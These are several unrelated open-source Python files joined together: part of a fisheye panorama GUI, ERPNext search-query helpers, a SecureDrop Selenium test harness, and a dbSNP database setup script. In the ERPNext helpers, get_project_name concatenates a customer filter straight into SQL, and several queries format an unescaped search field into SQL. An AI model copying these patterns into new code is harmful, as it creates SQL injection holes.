self.preview_lbl = tk.Label(self.preview_frm) # Label displays image
self.preview_lbl.pack()
self.preview_frm.pack(fill=tk.BOTH, expand=1)
# Finish frame creation.
self.frame.pack(fill=tk.BOTH, expand=1)
# Render the image once at default size
self.init_done = True
self.update_preview(psize)
# Disable further size propagation.
self.preview_frm.update()
self.preview_frm.pack_propagate(0)
# Update the GUI preview using latest alignment parameters.
def update_preview(self, psize):
# Sanity check that initialization is completed:
if not self.init_done: return
# Determine the primary axis of rotation.
if self.flip_axis.get():
flip_qq = [0,0,0,1]
else:
flip_qq = [0,0,1,0]
# Calculate the orientation of both lenses.
front_qq = norm_qq(self.slide_rx.get(),
self.slide_ry.get(),
self.slide_rz.get())
align_qq = norm_qq(self.slide_ax.get(),
self.slide_ay.get(),
self.slide_az.get())
back_qq = mul_qq(align_qq, mul_qq(flip_qq, front_qq))
self.panorama.sources[0].lens.center_qq = front_qq
self.panorama.sources[1].lens.center_qq = back_qq
# Render the preview.
# Note: The Tk-Label doesn't maintain a reference to the image object.
# To avoid garbage-collection, keep one in this class.
self.preview_img = ImageTk.PhotoImage(
self.panorama.render_equirectangular(psize, self.mode.get()))
# Assign the new icon.
self.preview_lbl.configure(image=self.preview_img)
# Find the largest output size that fits within the given bounds and
# matches the 2:1 aspect ratio of the equirectangular preview.
def _get_aspect_size(self, max_size):
return (min(max_size[0], max_size[1] / 2),
min(max_size[1], max_size[0] * 2))
# Make a combined label/textbox/slider for a given variable:
def _make_slider(self, parent, rowidx, label, inival):
# Set limits and resolution.
lim = 1.0
res = 0.001
# Create shared variable.
tkvar = tk.DoubleVar()
tkvar.set(inival)
# Set a callback for whenever tkvar is changed.
# (The 'command' callback on the SpinBox only applies to the buttons.)
tkvar.trace('w', self._update_callback)
# Create the Label, SpinBox, and Scale objects.
label = tk.Label(parent, text=label)
spbox = tk.Spinbox(parent,
textvariable=tkvar,
from_=-lim, to=lim, increment=res)
slide = tk.Scale(parent,
orient=tk.HORIZONTAL,
showvalue=0,
variable=tkvar,
from_=-lim, to=lim, resolution=res)
label.grid(row=rowidx, column=0, sticky='W')
spbox.grid(row=rowidx, column=1)
slide.grid(row=rowidx, column=2)
return tkvar
# Thin wrapper for update_preview(), used to strip Tkinter arguments.
def _update_callback(self, *args):
# Sanity check that initialization is completed:
if not self.init_done: return
# Determine the render size. (Always 2:1 aspect ratio.)
psize = min(self.preview_frm.winfo_width()/2,
self.preview_frm.winfo_height())
# Render the preview at the given size.
# TODO: Fudge factor of -2 avoids infinite resize loop.
# Is there a better way?
if psize >= 10:
self.update_preview(psize-2)
# Tkinter GUI window for end-to-end alignment and rendering.
class PanoramaGUI:
def __init__(self, parent):
# Store reference object for creating child dialogs.
self.parent = parent
self.win_lens1 = None
self.win_lens2 = None
self.win_align = None
self.work_done = False
self.work_error = None
self.work_status = None
# Create dummy lens configuration.
self.lens1 = FisheyeLens()
self.lens2 = FisheyeLens()
self.lens2.center_qq = [0,0,1,0] # Default flip along Y axis.
# Create frame for this GUI.
parent.wm_title('Panorama Creation Tool')
frame = tk.Frame(parent)
# Make file-selection inputs for the two images.
img_frame = tk.LabelFrame(frame, text='Input Images')
self.img1 = self._make_file_select(img_frame, 0, 'Image #1')
self.img2 = self._make_file_select(img_frame, 1, 'Image #2')
img_frame.pack()
# Make buttons to load, save, and adjust the lens configuration.
lens_frame = tk.LabelFrame(frame, text='Lens Configuration and Alignment')
btn_lens1 = tk.Button(lens_frame, text='Lens 1', command=self._adjust_lens1)
btn_lens2 = tk.Button(lens_frame, text='Lens 2', command=self._adjust_lens2)
btn_align = tk.Button(lens_frame, text='Align', command=self._adjust_align)
btn_auto = tk.Button(lens_frame, text='Auto', command=self._auto_align_start)
btn_load = tk.Button(lens_frame, text='Load', command=self.load_config)
btn_save = tk.Button(lens_frame, text='Save', command=self.save_config)
btn_lens1.grid(row=0, column=0, sticky='NESW')
btn_lens2.grid(row=0, column=1, sticky='NESW')
btn_align.grid(row=0, column=2, sticky='NESW')
btn_auto.grid(row=0, column=3, sticky='NESW')
btn_load.grid(row=1, column=0, columnspan=2, sticky='NESW')
btn_save.grid(row=1, column=2, columnspan=2, sticky='NESW')
lens_frame.pack(fill=tk.BOTH)
# Buttons to render the final output in different modes.
out_frame = tk.LabelFrame(frame, text='Final output rendering')
btn_rect = tk.Button(out_frame, text='Equirectangular',
command=self._render_rect)
btn_cube = tk.Button(out_frame, text='Cubemap',
command=self._render_cube)
btn_rect.pack(fill=tk.BOTH)
btn_cube.pack(fill=tk.BOTH)
out_frame.pack(fill=tk.BOTH)
# Status indicator box.
self.status = tk.Label(frame, relief=tk.SUNKEN,
text='Select input images to begin.')
self.status.pack(fill=tk.BOTH)
# Finish frame creation.
frame.pack()
# Helper function to destroy an object.
def _destroy(self, obj):
if obj is not None:
obj.destroy()
# Popup dialogs for each alignment step.
def _adjust_lens1(self):
self._destroy(self.win_lens1)
try:
self.win_lens1 = tk.Toplevel(self.parent)
FisheyeAlignmentGUI(self.win_lens1, self.img1.get(), self.lens1)
except IOError:
self._destroy(self.win_lens1)
tkMessageBox.showerror('Error', 'Unable to read image file #1.')
except:
self._destroy(self.win_lens1)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
def _adjust_lens2(self):
self._destroy(self.win_lens2)
try:
self.win_lens2 = tk.Toplevel(self.parent)
FisheyeAlignmentGUI(self.win_lens2, self.img2.get(), self.lens2)
except IOError:
self._destroy(self.win_lens2)
tkMessageBox.showerror('Error', 'Unable to read image file #2.')
except:
self._destroy(self.win_lens2)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
def _adjust_align(self):
self._destroy(self.win_align)
try:
pan = self._create_panorama()
self.win_align = tk.Toplevel(self.parent)
PanoramaAlignmentGUI(self.win_align, pan)
except:
self._destroy(self.win_align)
tkMessageBox.showerror('Dialog creation error', traceback.format_exc())
# Automatic alignment.
# Use worker thread, because this may take a while.
def _auto_align_start(self):
try:
# Create panorama object from within GUI thread, since it depends
# on Tk variables which are NOT thread-safe.
pan = self._create_panorama()
# Display status message and display hourglass...
self._set_status('Starting auto-alignment...', 'wait')
# Create a new worker thread.
work = Thread(target=self._auto_align_work, args=[pan])
work.start()
# Set a timer to periodically check for completion.
self.parent.after(200, self._auto_align_timer)
except:
tkMessageBox.showerror('Auto-alignment error', traceback.format_exc())
def _auto_align_work(self, pan):
try:
# Repeat alignment at progressively higher resolution.
self._auto_align_step(pan, 16, 128, 'Stage 1/4')
self._auto_align_step(pan, 8, 128, 'Stage 2/4')
self._auto_align_step(pan, 4, 192, 'Stage 3/4')
self._auto_align_step(pan, 2, 256, 'Stage 4/4')
# Signal success!
self.work_status = 'Auto-alignment completed.'
self.work_error = None
self.work_done = True
except:
# Signal error.
self.work_status = 'Auto-alignment failed.'
self.work_error = traceback.format_exc()
self.work_done = True
def _auto_align_step(self, pan, scale, psize, label):
# Update status message.
self.work_status = 'Auto-alignment: ' + str(label)
# Create a panorama object at 1/scale times original resolution.
pan_sc = deepcopy(pan)
pan_sc.downsample(scale)
# Run optimization, rendering each hypothesis at the given resolution.
pan_sc.optimize(psize)
# Update local lens parameters.
# Note: These are not Tk variables, so are safe to change.
self.lens1 = pan_sc.scale_lens(0, scale)
self.lens2 = pan_sc.scale_lens(1, scale)
# Timer callback object checks outputs from worker thread.
# (Tkinter objects are NOT thread safe.)
def _auto_align_timer(self, *args):
# Check thread status.
if self.work_done:
# Update status message, with popup on error.
if self.work_status is not None:
self._set_status(self.work_status)
if self.work_error is not None:
self._set_status('Auto-alignment failed.')
tkMessageBox.showerror('Auto-alignment error', self.work_error)
# Clear the 'done' flag for future runs.
self.work_done = False
else:
# Update status message and keep hourglass.
if self.work_status is not None:
self._set_status(self.work_status, 'wait')
# Reset timer to be called again.
self.parent.after(200, self._auto_align_timer)
# Create panorama object using current settings.
def _create_panorama(self):
img1 = FisheyeImage(self.img1.get(), self.lens1)
img2 = FisheyeImage(self.img2.get(), self.lens2)
return PanoramaImage((img1, img2))
# Load or save lens configuration and alignment.
def load_config(self, filename=None):
if filename is None:
file_obj = tkFileDialog.askopenfile()
if file_obj is None: return
else:
file_obj = open(filename, 'r')
try:
load_config(file_obj, self.lens1, self.lens2)
except:
tkMessageBox.showerror('Config load error', traceback.format_exc())
def save_config(self, filename=None):
if filename is None:
file_obj = tkFileDialog.asksaveasfile()
if file_obj is None: return
else:
file_obj = open(filename, 'w')
try:
save_config(file_obj, self.lens1, self.lens2)
except:
tkMessageBox.showerror('Config save error', traceback.format_exc())
# Render and save output in various modes.
def _render_generic(self, render_type, render_size=1024):
# Popup asks user for output file.
file_obj = tkFileDialog.asksaveasfile(mode='wb')
# Abort if user clicks 'cancel'.
if file_obj is None: return
# Proceed with rendering...
self._set_status('Rendering image: ' + file_obj.name, 'wait')
try:
panorama = self._create_panorama()
render_func = getattr(panorama, render_type)
render_func(render_size).save(file_obj)
self._set_status('Done!')
except:
tkMessageBox.showerror('Render error', traceback.format_exc())
self._set_status('Render failed.')
def _render_rect(self):
self._render_generic('render_equirectangular')
def _render_cube(self):
self._render_generic('render_cubemap')
# Callback to create a file-selection popup.
def _file_select(self, tkstr):
result = tkFileDialog.askopenfile()
if result is not None:
tkstr.set(result.name)
result.close()
# Make a combined label/textbox/slider for a given variable:
def _make_file_select(self, parent, rowidx, label):
# Create string variable.
tkstr = tk.StringVar()
# Create callback event handler.
cmd = lambda: self._file_select(tkstr)
# Create the Label, Entry, and Button objects.
label = tk.Label(parent, text=label)
entry = tk.Entry(parent, textvariable=tkstr)
button = tk.Button(parent, text='...', command=cmd)
label.grid(row=rowidx, column=0, sticky='W')
entry.grid(row=rowidx, column=1)
button.grid(row=rowidx, column=2)
return tkstr
# Set status text, and optionally update cursor.
def _set_status(self, status, cursor='arrow'):
self.parent.config(cursor=cursor)
self.status.configure(text=status)
def launch_tk_gui(flens='', fimg1='', fimg2=''):
# Create TK root object and GUI window.
root = tk.Tk()
gui = PanoramaGUI(root)
# Load parameters if specified.
if flens is not None and len(flens) > 0:
gui.load_config(flens)
if fimg1 is not None and len(fimg1) > 0:
gui.img1.set(fimg1)
if fimg2 is not None and len(fimg2) > 0:
gui.img2.set(fimg2)
# Start main loop.
root.mainloop()
if __name__ == "__main__":
# If we have exactly four arguments, run command-line version.
if len(sys.argv) == 5 and sys.argv[4].startswith('gui'):
# Special case for interactive mode.
launch_tk_gui(sys.argv[1], sys.argv[2], sys.argv[3])
elif len(sys.argv) == 5:
# First argument is the lens alignment file.
lens1 = FisheyeLens()
lens2 = FisheyeLens()
cfg = open(sys.argv[1], 'r')
load_config(cfg, lens1, lens2)
# Second and third arguments are the source files.
img1 = FisheyeImage(sys.argv[2], lens1)
img2 = FisheyeImage(sys.argv[3], lens2)
# Fourth argument is the mode and output filename.
if sys.argv[4].startswith('cube='):
out = sys.argv[5:]
pan = PanoramaImage((img1, img2))
pan.render_cubemap(1024).save(out)
elif sys.argv[4].startswith('rect='):
out = sys.argv[5:]
pan = PanoramaImage((img1, img2))
pan.render_equirectangular(1024).save(out)
else:
print 'Unrecognized render mode (cube=, rect=, gui)'
elif len(sys.argv) > 1:
# If requested, print command-line usage information.
print 'Usage instructions:'
print ' python fisheye.py'
print ' Start interactive alignment GUI.'
print ' python fisheye.py -help'
print ' Print this help message.'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg gui'
print ' Launch interactive GUI with specified default options'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg rect=out.png'
print ' Render and save equirectangular panorama using specified'
print ' lens configuration and source images.'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg cube=out.png'
print ' Render and save cubemap panorama using specified'
print ' lens configuration and source images.'
else:
# Otherwise, start the interactive GUI with all fields blank.
launch_tk_gui()
| ooterness/DualFisheye | fisheye.py | Python | mit | 44,517 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.desk.reportview import get_match_cond
from frappe.model.db_query import DatabaseQuery
from frappe.utils import nowdate
def get_filters_cond(doctype, filters, conditions):
if filters:
if isinstance(filters, dict):
filters = filters.items()
flt = []
for f in filters:
if isinstance(f[1], basestring) and f[1][0] == '!':
flt.append([doctype, f[0], '!=', f[1][1:]])
else:
flt.append([doctype, f[0], '=', f[1]])
query = DatabaseQuery(doctype)
query.filters = flt
query.conditions = conditions
query.build_filter_conditions(flt, conditions)
cond = ' and ' + ' and '.join(query.conditions)
else:
cond = ''
return cond
# searches for active employees
def employee_query(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select name, employee_name from `tabEmployee`
where status = 'Active'
and docstatus < 2
and ({key} like %(txt)s
or employee_name like %(txt)s)
{mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, employee_name), locate(%(_txt)s, employee_name), 99999),
name, employee_name
limit %(start)s, %(page_len)s""".format(**{
'key': searchfield,
'mcond': get_match_cond(doctype)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len
})
# searches for leads which are not converted
def lead_query(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select name, lead_name, company_name from `tabLead`
where docstatus < 2
and ifnull(status, '') != 'Converted'
and ({key} like %(txt)s
or lead_name like %(txt)s
or company_name like %(txt)s)
{mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, lead_name), locate(%(_txt)s, lead_name), 99999),
if(locate(%(_txt)s, company_name), locate(%(_txt)s, company_name), 99999),
name, lead_name
limit %(start)s, %(page_len)s""".format(**{
'key': searchfield,
'mcond':get_match_cond(doctype)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len
})
# searches for customer
def customer_query(doctype, txt, searchfield, start, page_len, filters):
cust_master_name = frappe.defaults.get_user_default("cust_master_name")
if cust_master_name == "Customer Name":
fields = ["name", "customer_group", "territory"]
else:
fields = ["name", "customer_name", "customer_group", "territory"]
fields = ", ".join(fields)
return frappe.db.sql("""select {fields} from `tabCustomer`
where docstatus < 2
and ({key} like %(txt)s
or customer_name like %(txt)s)
{mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, customer_name), locate(%(_txt)s, customer_name), 99999),
name, customer_name
limit %(start)s, %(page_len)s""".format(**{
"fields": fields,
"key": searchfield,
"mcond": get_match_cond(doctype)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len
})
# searches for supplier
def supplier_query(doctype, txt, searchfield, start, page_len, filters):
supp_master_name = frappe.defaults.get_user_default("supp_master_name")
if supp_master_name == "Supplier Name":
fields = ["name", "supplier_type"]
else:
fields = ["name", "supplier_name", "supplier_type"]
fields = ", ".join(fields)
return frappe.db.sql("""select {field} from `tabSupplier`
where docstatus < 2
and ({key} like %(txt)s
or supplier_name like %(txt)s)
{mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, supplier_name), locate(%(_txt)s, supplier_name), 99999),
name, supplier_name
limit %(start)s, %(page_len)s """.format(**{
'field': fields,
'key': searchfield,
'mcond':get_match_cond(doctype)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len
})
def tax_account_query(doctype, txt, searchfield, start, page_len, filters):
tax_accounts = frappe.db.sql("""select name, parent_account from tabAccount
where tabAccount.docstatus!=2
and account_type in (%s)
and is_group = 0
and company = %s
and `%s` LIKE %s
limit %s, %s""" %
(", ".join(['%s']*len(filters.get("account_type"))), "%s", searchfield, "%s", "%s", "%s"),
tuple(filters.get("account_type") + [filters.get("company"), "%%%s%%" % txt,
start, page_len]))
if not tax_accounts:
tax_accounts = frappe.db.sql("""select name, parent_account from tabAccount
where tabAccount.docstatus!=2 and is_group = 0
and company = %s and `%s` LIKE %s limit %s, %s"""
% ("%s", searchfield, "%s", "%s", "%s"),
(filters.get("company"), "%%%s%%" % txt, start, page_len))
return tax_accounts
def item_query(doctype, txt, searchfield, start, page_len, filters):
conditions = []
return frappe.db.sql("""select tabItem.name,
if(length(tabItem.item_name) > 40,
concat(substr(tabItem.item_name, 1, 40), "..."), item_name) as item_name,
if(length(tabItem.description) > 40, \
concat(substr(tabItem.description, 1, 40), "..."), description) as decription
from tabItem
where tabItem.docstatus < 2
and ifnull(tabItem.has_variants, 0)=0
and (tabItem.end_of_life > %(today)s or ifnull(tabItem.end_of_life, '0000-00-00')='0000-00-00')
and (tabItem.`{key}` LIKE %(txt)s
or tabItem.item_name LIKE %(txt)s
or tabItem.description LIKE %(txt)s)
{fcond} {mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, item_name), locate(%(_txt)s, item_name), 99999),
name, item_name
limit %(start)s, %(page_len)s """.format(key=searchfield,
fcond=get_filters_cond(doctype, filters, conditions),
mcond=get_match_cond(doctype)),
{
"today": nowdate(),
"txt": "%%%s%%" % txt,
"_txt": txt.replace("%", ""),
"start": start,
"page_len": page_len
})
def bom(doctype, txt, searchfield, start, page_len, filters):
conditions = []
return frappe.db.sql("""select tabBOM.name, tabBOM.item
from tabBOM
where tabBOM.docstatus=1
and tabBOM.is_active=1
and tabBOM.%(key)s like "%(txt)s"
%(fcond)s %(mcond)s
limit %(start)s, %(page_len)s """ % {'key': searchfield, 'txt': "%%%s%%" % frappe.db.escape(txt),
'fcond': get_filters_cond(doctype, filters, conditions),
'mcond':get_match_cond(doctype), 'start': start, 'page_len': page_len})
def get_project_name(doctype, txt, searchfield, start, page_len, filters):
cond = ''
if filters.get('customer'):
cond = '(`tabProject`.customer = "' + filters['customer'] + '" or ifnull(`tabProject`.customer,"")="") and'
return frappe.db.sql("""select `tabProject`.name from `tabProject`
where `tabProject`.status not in ("Completed", "Cancelled")
and %(cond)s `tabProject`.name like "%(txt)s" %(mcond)s
order by `tabProject`.name asc
limit %(start)s, %(page_len)s """ % {'cond': cond,'txt': "%%%s%%" % frappe.db.escape(txt),
'mcond':get_match_cond(doctype),'start': start, 'page_len': page_len})
def get_delivery_notes_to_be_billed(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select `tabDelivery Note`.name, `tabDelivery Note`.customer_name
from `tabDelivery Note`
where `tabDelivery Note`.`%(key)s` like %(txt)s and
`tabDelivery Note`.docstatus = 1 %(fcond)s and
(ifnull((select sum(qty) from `tabDelivery Note Item` where
`tabDelivery Note Item`.parent=`tabDelivery Note`.name), 0) >
ifnull((select sum(qty) from `tabSales Invoice Item` where
`tabSales Invoice Item`.docstatus = 1 and
`tabSales Invoice Item`.delivery_note=`tabDelivery Note`.name), 0))
%(mcond)s order by `tabDelivery Note`.`%(key)s` asc
limit %(start)s, %(page_len)s""" % {
"key": searchfield,
"fcond": get_filters_cond(doctype, filters, []),
"mcond": get_match_cond(doctype),
"start": "%(start)s", "page_len": "%(page_len)s", "txt": "%(txt)s"
}, { "start": start, "page_len": page_len, "txt": ("%%%s%%" % txt) })
def get_batch_no(doctype, txt, searchfield, start, page_len, filters):
if not filters.get("posting_date"):
filters["posting_date"] = nowdate()
batch_nos = None
args = {
'item_code': filters.get("item_code"),
'warehouse': filters.get("warehouse"),
'posting_date': filters.get('posting_date'),
'txt': "%{0}%".format(txt),
"start": start,
"page_len": page_len
}
if args.get('warehouse'):
batch_nos = frappe.db.sql("""select sle.batch_no, round(sum(sle.actual_qty),2), sle.stock_uom, batch.expiry_date
from `tabStock Ledger Entry` sle
INNER JOIN `tabBatch` batch on sle.batch_no = batch.name
where
sle.item_code = %(item_code)s
and sle.warehouse = %(warehouse)s
and sle.batch_no like %(txt)s
and batch.docstatus < 2
and (ifnull(batch.expiry_date, '')='' or batch.expiry_date >= %(posting_date)s)
{match_conditions}
group by batch_no having sum(sle.actual_qty) > 0
order by batch.expiry_date, sle.batch_no desc
limit %(start)s, %(page_len)s""".format(match_conditions=get_match_cond(doctype)), args)
if batch_nos:
return batch_nos
else:
return frappe.db.sql("""select name, expiry_date from `tabBatch`
where item = %(item_code)s
and name like %(txt)s
and docstatus < 2
and (ifnull(expiry_date, '')='' or expiry_date >= %(posting_date)s)
{match_conditions}
order by expiry_date, name desc
limit %(start)s, %(page_len)s""".format(match_conditions=get_match_cond(doctype)), args)
def get_account_list(doctype, txt, searchfield, start, page_len, filters):
filter_list = []
if isinstance(filters, dict):
for key, val in filters.items():
if isinstance(val, (list, tuple)):
filter_list.append([doctype, key, val[0], val[1]])
else:
filter_list.append([doctype, key, "=", val])
elif isinstance(filters, list):
filter_list.extend(filters)
if "is_group" not in [d[1] for d in filter_list]:
filter_list.append(["Account", "is_group", "=", "0"])
if searchfield and txt:
filter_list.append([doctype, searchfield, "like", "%%%s%%" % txt])
return frappe.desk.reportview.execute("Account", filters = filter_list,
fields = ["name", "parent_account"],
limit_start=start, limit_page_length=page_len, as_list=True)
| indictranstech/tele-erpnext | erpnext/controllers/queries.py | Python | agpl-3.0 | 10,512 |
# -*- coding: utf-8 -*-
from datetime import datetime
import errno
import mock
from multiprocessing import Process
import os
from os.path import abspath, dirname, join, realpath
import signal
import socket
import time
import traceback
import requests
from Cryptodome import Random
from selenium import webdriver
from selenium.common.exceptions import (WebDriverException,
NoAlertPresentException)
from selenium.webdriver.firefox import firefox_binary
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions
os.environ['SECUREDROP_ENV'] = 'test' # noqa
import config
import db
import journalist
from source_app import create_app
import crypto_util
import tests.utils.env as env
LOG_DIR = abspath(join(dirname(realpath(__file__)), '..', 'log'))
# https://stackoverflow.com/a/34795883/837471
class alert_is_not_present(object):
""" Expect an alert to not be present."""
def __call__(self, driver):
try:
alert = driver.switch_to.alert
alert.text
return False
except NoAlertPresentException:
return True
class FunctionalTest(object):
def _unused_port(self):
s = socket.socket()
s.bind(("localhost", 0))
port = s.getsockname()[1]
s.close()
return port
def _create_webdriver(self, firefox, profile=None):
# see https://review.openstack.org/#/c/375258/ and the
# associated issues for background on why this is necessary
connrefused_retry_count = 3
connrefused_retry_interval = 5
for i in range(connrefused_retry_count + 1):
try:
driver = webdriver.Firefox(firefox_binary=firefox,
firefox_profile=profile)
if i > 0:
# i==0 is normal behavior without connection refused.
print('NOTE: Retried {} time(s) due to '
'connection refused.'.format(i))
return driver
except socket.error as socket_error:
if (socket_error.errno == errno.ECONNREFUSED
and i < connrefused_retry_count):
time.sleep(connrefused_retry_interval)
continue
raise
def _prepare_webdriver(self):
log_file = open(join(LOG_DIR, 'firefox.log'), 'a')
log_file.write(
'\n\n[%s] Running Functional Tests\n' % str(
datetime.now()))
log_file.flush()
return firefox_binary.FirefoxBinary(log_file=log_file)
def setup(self, session_expiration=30):
# Patch the two-factor verification to avoid intermittent errors
self.patcher = mock.patch('db.Journalist.verify_token')
self.mock_journalist_verify_token = self.patcher.start()
self.mock_journalist_verify_token.return_value = True
self.patcher2 = mock.patch('source_app.main.get_entropy_estimate')
self.mock_get_entropy_estimate = self.patcher2.start()
self.mock_get_entropy_estimate.return_value = 8192
signal.signal(signal.SIGUSR1, lambda _, s: traceback.print_stack(s))
env.create_directories()
self.gpg = env.init_gpg()
db.init_db()
source_port = self._unused_port()
journalist_port = self._unused_port()
self.source_location = "http://localhost:%d" % source_port
self.journalist_location = "http://localhost:%d" % journalist_port
# Allow custom session expiration lengths
self.session_expiration = session_expiration
def start_source_server():
# We call Random.atfork() here because we fork the source and
# journalist server from the main Python process we use to drive
# our browser with multiprocessing.Process() below. These child
# processes inherit the same RNG state as the parent process, which
# is a problem because they would produce identical output if we
# didn't re-seed them after forking.
Random.atfork()
config.SESSION_EXPIRATION_MINUTES = self.session_expiration
source_app = create_app(config)
source_app.run(
port=source_port,
debug=True,
use_reloader=False,
threaded=True)
def start_journalist_server():
Random.atfork()
journalist.app.run(
port=journalist_port,
debug=True,
use_reloader=False,
threaded=True)
self.source_process = Process(target=start_source_server)
self.journalist_process = Process(target=start_journalist_server)
self.source_process.start()
self.journalist_process.start()
for tick in range(30):
try:
requests.get(self.source_location)
requests.get(self.journalist_location)
except:
time.sleep(1)
else:
break
if not hasattr(self, 'override_driver'):
self.driver = self._create_webdriver(self._prepare_webdriver())
# Polls the DOM to wait for elements. To read more about why
# this is necessary:
#
# http://www.obeythetestinggoat.com/how-to-get-selenium-to-wait-for-page-load-after-a-click.html
#
# A value of 5 is known to not be enough in some cases, when
# the machine hosting the tests is slow, reason why it was
# raised to 10. Setting the value to 60 or more would surely
# cover even the slowest of machine. However it also means
# that a test failing to find the desired element in the DOM
# will only report failure after 60 seconds which is painful
# for quickly debuging.
#
self.driver.implicitly_wait(10)
# Set window size and position explicitly to avoid potential bugs due
# to discrepancies between environments.
self.driver.set_window_position(0, 0)
self.driver.set_window_size(1024, 768)
self.secret_message = ('These documents outline a major government '
'invasion of privacy.')
def wait_for_source_key(self, source_name):
filesystem_id = crypto_util.hash_codename(source_name)
def key_available(filesystem_id):
assert crypto_util.getkey(filesystem_id)
self.wait_for(
lambda: key_available(filesystem_id), timeout=60)
def teardown(self):
self.patcher.stop()
env.teardown()
if not hasattr(self, 'override_driver'):
self.driver.quit()
self.source_process.terminate()
self.journalist_process.terminate()
def wait_for(self, function_with_assertion, timeout=5):
"""Polling wait for an arbitrary assertion."""
# Thanks to
# http://chimera.labs.oreilly.com/books/1234000000754/ch20.html#_a_common_selenium_problem_race_conditions
start_time = time.time()
while time.time() - start_time < timeout:
try:
return function_with_assertion()
except (AssertionError, WebDriverException):
time.sleep(0.1)
# one more try, which will raise any errors if they are outstanding
return function_with_assertion()
def _alert_wait(self):
WebDriverWait(self.driver, 10).until(
expected_conditions.alert_is_present(),
'Timed out waiting for confirmation popup.')
def _alert_accept(self):
self.driver.switch_to.alert.accept()
WebDriverWait(self.driver, 10).until(
alert_is_not_present(),
'Timed out waiting for confirmation popup to disappear.')
def _alert_dismiss(self):
self.driver.switch_to.alert.dismiss()
WebDriverWait(self.driver, 10).until(
alert_is_not_present(),
'Timed out waiting for confirmation popup to disappear.')
| garrettr/securedrop | securedrop/tests/functional/functional_test.py | Python | agpl-3.0 | 8,117 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import os
import glob
import argparse
from pprint import pformat
from lib.termcolor import colored
from cmd import run, force, cd
from log import Logger
log = Logger(__name__)
DBSNP_HOME = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DBSNP_BUILDS = ['b147', 'b146', 'b144']
DBSNP_DEFAULT = 'b146'
GENOME_BUILDS = ['GRCh38', 'GRCh37']
GENOME_DEFAULT = 'GRCh37'
PLUGINS = ['freq']
BUILD_TARGETS = ['core'] + PLUGINS
VERSION = open(os.path.join(DBSNP_HOME, 'VERSION')).readline().strip()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--version', action='version', version='%(prog)s {}'.format(VERSION))
parser.add_argument('--dbsnp-build', default=DBSNP_DEFAULT, choices=DBSNP_BUILDS, help='dbSNP build ID')
parser.add_argument('--genome-build', default=GENOME_DEFAULT, choices=GENOME_BUILDS, help='reference genome build ID')
parser.add_argument('--prefix', default='dbsnp', help='prefix for database name')
subparsers = parser.add_subparsers()
parser_restore = subparsers.add_parser('restore', help='restore database from pg_dump')
parser_restore.add_argument('--tag', default=VERSION, help='dbsnp-pg release tag')
parser_restore.set_defaults(func=restore)
parser_build = subparsers.add_parser('build', help='build database from resources')
parser_build.add_argument('--target', nargs='+', default=BUILD_TARGETS, choices=BUILD_TARGETS, help='build targets')
parser_build.set_defaults(func=build)
parser_init_demo = subparsers.add_parser('init-demo', help='init demo database')
parser_init_demo.add_argument('--demo-db-name', default='dbsnp_demo', help='demo database name')
parser_init_demo.add_argument('--demo-db-user', default='dbsnp_demo', help='demo database user')
parser_init_demo.set_defaults(func=init_demo)
args = parser.parse_args()
args.func(args)
def restore(args):
context = {
'dbsnp_build': args.dbsnp_build,
'genome_build': args.genome_build,
'prefix': args.prefix,
'tag': args.tag,
}
context['db_src_name'] = 'dbsnp_{dbsnp_build}_{genome_build}'.format(**context)
context['db_name'] = '{prefix}_{dbsnp_build}_{genome_build}'.format(**context)
context['db_user'] = 'dbsnp'
log.info(colored(pformat(context), 'blue'))
with cd(DBSNP_HOME):
force('createuser {db_user}'.format(**context))
run('./script/pg_restore.sh {db_src_name} {db_name} {db_user} {tag}'.format(**context))
log.info('Done')
log.info('To connect via psql, run:')
log.info('')
log.info(colored('$ psql {db_name} -U {db_user}'.format(**context), 'blue', attrs=['bold']))
log.info('')
def build(args):
context = {
'dbsnp_build': args.dbsnp_build,
'genome_build': args.genome_build,
'prefix': args.prefix,
'target': args.target,
}
context['db_name'] = '{prefix}_{dbsnp_build}_{genome_build}'.format(**context)
context['db_user'] = 'dbsnp'
log.info(colored(pformat(context), 'blue'))
with cd(DBSNP_HOME):
force('createuser {db_user}'.format(**context))
force('createdb --owner={db_user} {db_name}'.format(**context))
target = [DBSNP_HOME] if 'core' in args.target else []
target += [os.path.join(DBSNP_HOME, 'contrib', x) for x in set(args.target) if x != 'core']
for src in target:
with cd(src):
run('pwd')
if glob.glob('02_drop_create_table.*'):
context.update(src=src)
run('./01_fetch_data.sh -d {dbsnp_build} -r {genome_build} {src}/data'.format(**context))
run('./02_drop_create_table.sh {db_name} {db_user} {src}'.format(**context))
run('./03_import_data.sh {db_name} {db_user} {src} {src}/data'.format(**context))
log.info('Done')
log.info('To connect via psql, run:')
log.info('')
log.info(colored('$ psql {db_name} -U {db_user}'.format(**context), 'blue', attrs=['bold']))
log.info('')
def init_demo(args):
context = {
'db_user': args.demo_db_user,
'db_name': args.demo_db_name,
}
